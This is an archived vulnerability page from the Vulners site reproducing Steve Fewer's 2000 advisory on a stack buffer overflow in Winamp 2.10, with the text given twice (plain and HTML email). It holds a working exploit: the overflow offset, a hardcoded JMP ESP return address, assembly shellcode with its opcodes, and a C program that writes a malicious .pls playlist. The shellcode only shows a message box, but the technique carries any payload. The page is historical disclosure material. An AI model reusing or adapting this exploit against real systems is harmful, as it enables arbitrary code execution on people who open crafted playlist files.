Vulners
Lucene search
winamp.win98.txt
`Author: Steve Fewer, [email protected]
http://indigo.ie/~lmf
Introduction:
I recently uncovered a stack based buffer overflow in winamp
version 2.10 which lets me execute 'arbitrary code'. It is=20
carried out through .pls files which winamp uses for playlists.=20
This is unnerving as it is a feasible plan to trade playlists on
irc during a mp3 trading session with someone.
The overflow occurs when an entry greater than 580 bytes is=20
read in from a .pls file. The EIP is the only register overwritten=20
in the next four bytes that follow, from there on is space for=20
your shell code. eg.
[playlist]
File1=3D<580 bytes><eip><shell code>
NumberOfEntries=3D1 =20
The first 580 bytes get mangled around in memory but the 585=20
byte (where our shell code starts) is pointed to by the ESP,=20
therefore a simple 'JMP ESP' or the like will land us back in=20
our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in=20
comctl32.dll which winamp loads. Pointing our EIP into that=20
address lands us back where we want to be.=20
This was all created/tested on Windows 98 [Version 4.10.1998]
running on an Intel PII400 with 128MB RAM.
The Shell Code:
The shell code I wrote for this simply displays a message box=20
and then calls exit(). However Winamp doesn't load msvcrt.dll=20
which is needed to call exit() so we have to load it ourselves.=20
I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for
LoadLibraryA(). For calling Messagebox I used the address=20
0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I=20
used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It=20
didn't warrant using GetProcAddress for compatibilities sake.
For the OP codes see the exploit further on.
// This loads msvcrt.dll
push ebp
mov ebp,esp
xor eax,eax
push eax
push eax
push eax
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
mov edx,0xBFF776D4
push edx
lea eax,[ebp-0Ch]
push eax
call dword ptr[ebp-10h]
// This calls MessageBox to say 'Hi!'
push ebp
mov ebp,esp
xor edi,edi
push edi
mov byte ptr[ebp-04h],48h
mov byte ptr[ebp-03h],69h
mov byte ptr[ebp-02h],21h
mov edx, 0xBFF5412E
push edx
push edi
lea edx,[ebp-04h]
push edx
push edx
push edi
call dword ptr[ebp-08h]
// This calls exit()
push ebp
mov ebp,esp
mov edx,0xFFFFFFFF
sub edx,0x87FFAAFB
push edx
xor eax,eax
push eax
call dword ptr[ebp-04h]
The Exploit:
<-snip->
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at [email protected]
*
* For a detailed description on the exploit see my advisory.
*
* Tested with Winamp v2.10 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
*/
#include <stdio.h>
int main()
{
printf("\n\n\t\t.......................................\n");
printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
printf("\t\t.......................................\n");
printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
printf("\t\t.........http://indigo.ie/~lmf.........\n");
printf("\t\t.......................................\n\n");
char buffer[640];
char eip[8] =3D "\xF7\xCF\xB9\xBF";
char sploit[256] =3D =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\=
xFA\x2E\xC6
\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\=
x45\xF4\x50
\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\=
x45\xFE\x21
\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\=
xEC\xBA\xFF
\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *file;
for(int x=3D0;x<580;x++)
{
buffer[x] =3D 0x90;
}
file =3D fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=3D");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=3D1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
<-snip->
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D
------=_NextPart_000_0029_01BF56CF.4A7BA760
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Nullsoft Winamp 2.10 buffer overflow=20
advisory<BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR>Author:=20
Steve Fewer, <A=20
href=3D"mailto:[email protected]">[email protected]</A><BR>&nbs=
p;  =
; =20
<A=20
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR>-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Introduction:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>I recently uncovered a stack based =
buffer overflow=20
in winamp<BR>version 2.10 which lets me execute 'arbitrary code'. It is=20
<BR>carried out through .pls files which winamp uses for playlists. =
<BR>This is=20
unnerving as it is a feasible plan to trade playlists on<BR>irc during a =
mp3=20
trading session with someone.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The overflow occurs when an entry =
greater than 580=20
bytes is <BR>read in from a .pls file. The EIP is the only register =
overwritten=20
<BR>in the next four bytes that follow, from there on is space for =
<BR>your=20
shell code. eg.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>[playlist]<BR>File1=3D<580=20
bytes><eip><shell code><BR>NumberOfEntries=3D1 =
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The first 580 bytes get mangled around =
in memory=20
but the 585 <BR>byte (where our shell code starts) is pointed to by the =
ESP,=20
<BR>therefore a simple 'JMP ESP' or the like will land us back in =
<BR>our shell=20
code. I used a 'JMP ESP' at address 0xBFB9CFF7 in <BR>comctl32.dll which =
winamp=20
loads. Pointing our EIP into that <BR>address lands us back where we =
want to be.=20
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>This was all created/tested on Windows =
98 [Version=20
4.10.1998]<BR>running on an Intel PII400 with 128MB RAM.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><BR>The Shell Code:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The shell code I wrote for this simply =
displays a=20
message box <BR>and then calls exit(). However Winamp doesn't load =
msvcrt.dll=20
<BR>which is needed to call exit() so we have to load it ourselves. =
<BR>I used=20
the address 0xBFF776D4 in kernel32.dll (v4.10.1998) =
for<BR>LoadLibraryA(). For=20
calling Messagebox I used the address <BR>0xBFF5412E in user32.dll =
(v4.10.1998)=20
and for calling exit() I <BR>used the address 0x78005504 in msvcrt.dll=20
(v6.00.8397.0). It <BR>didn't warrant using GetProcAddress for =
compatibilities=20
sake.<BR>For the OP codes see the exploit further on.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> // This loads=20
msvcrt.dll<BR> push ebp<BR> mov=20
ebp,esp<BR> xor eax,eax<BR> push=20
eax<BR> push eax<BR> push=20
eax<BR> mov byte =
ptr[ebp-0Ch],4Dh<BR> mov=20
byte ptr[ebp-0Bh],53h<BR> mov byte=20
ptr[ebp-0Ah],56h<BR> mov byte=20
ptr[ebp-09h],43h<BR> mov byte=20
ptr[ebp-08h],52h<BR> mov byte=20
ptr[ebp-07h],54h<BR> mov byte=20
ptr[ebp-06h],2Eh<BR> mov byte=20
ptr[ebp-05h],44h<BR> mov byte=20
ptr[ebp-04h],4Ch<BR> mov byte=20
ptr[ebp-03h],4Ch<BR> mov =
edx,0xBFF776D4<BR> =20
push edx<BR> lea eax,[ebp-0Ch]<BR> =
push=20
eax<BR> call dword ptr[ebp-10h]<BR> =
// This=20
calls MessageBox to say 'Hi!'<BR> push=20
ebp<BR> mov ebp,esp<BR> xor=20
edi,edi<BR> push edi<BR> mov byte=20
ptr[ebp-04h],48h<BR> mov byte=20
ptr[ebp-03h],69h<BR> mov byte=20
ptr[ebp-02h],21h<BR> mov edx, =
0xBFF5412E<BR> =20
push edx<BR> push edi<BR> lea=20
edx,[ebp-04h]<BR> push edx<BR> push=20
edx<BR> push edi<BR> call dword=20
ptr[ebp-08h]<BR> // This calls =
exit()<BR> =20
push ebp<BR> mov ebp,esp<BR> mov=20
edx,0xFFFFFFFF<BR> sub =
edx,0x87FFAAFB<BR> =20
push edx<BR> xor eax,eax<BR> push=20
eax<BR> call dword ptr[ebp-04h]</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The Exploit:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>/* Stack based buffer overflow exploit =
for Winamp=20
v2.10<BR> * Author Steve Fewer, 04-01-2k. Mail me at <A=20
href=3D"mailto:[email protected]">[email protected]</A><BR>&nbs=
p;*<BR> *=20
For a detailed description on the exploit see my =
advisory.<BR> *<BR> *=20
Tested with Winamp v2.10 using Windows98 on an Intel<BR> * PII 400 =
with=20
128MB RAM<BR> *<BR> * <A=20
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR> */</FON=
T></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#include <stdio.h></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>int main()<BR>{</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> =20
printf("\n\n\t\t.......................................\n");<BR> &nb=
sp; =20
printf("\t\t......Nullsoft Winamp 2.10 =
exploit.....\n");<BR> =20
printf("\t\t.......................................\n");<BR> &=
nbsp;=20
printf("\t\t.....Author: Steve Fewer, =
04-01-2k.....\n");<BR> =20
printf("\t\t.........http://indigo.ie/~lmf.........\n");<BR> &=
nbsp;=20
printf("\t\t.......................................\n\n");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>char buffer[640];<BR>char eip[8] =3D=20
"\xF7\xCF\xB9\xBF";<BR>char sploit[256] =3D=20
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53<BR>\xC6=
\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\=
x2E\xC6<BR>\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\x=
bF\x52\x8D\x45\xF4\x50<BR>\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xF=
C\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21<BR>\xBA\x2E\x41\xF5\xBF\x52\x57\x8D=
\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF<BR>\xFF\xFF\xFF\x81\=
xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>FILE *file;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> for(int=20
x=3D0;x<580;x++)<BR> {<BR> =
buffer[x] =3D=20
0x90;<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>file =3D =
fopen("crAsh.pls","wb");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>fprintf(file, =
"[playlist]\n");<BR>fprintf(file,=20
"File1=3D");<BR>fprintf(file, "%s", buffer);<BR>fprintf(file, "%s",=20
eip);<BR>fprintf(file, "%s", sploit);<BR>fprintf(file,=20
"\nNumberOfEntries=3D1");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2>fclose(file);<BR>printf("\t =20
created file crAsh.pls loaded with the exploit.\n");<BR>return=20
0;<BR>}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial=20
size=3D2><BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR></FONT></DIV></BO=
DY></HTML>
------=_NextPart_000_0029_01BF56CF.4A7BA760--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jan 2000 00:00Current
7.4High risk
Vulners AI Score7.4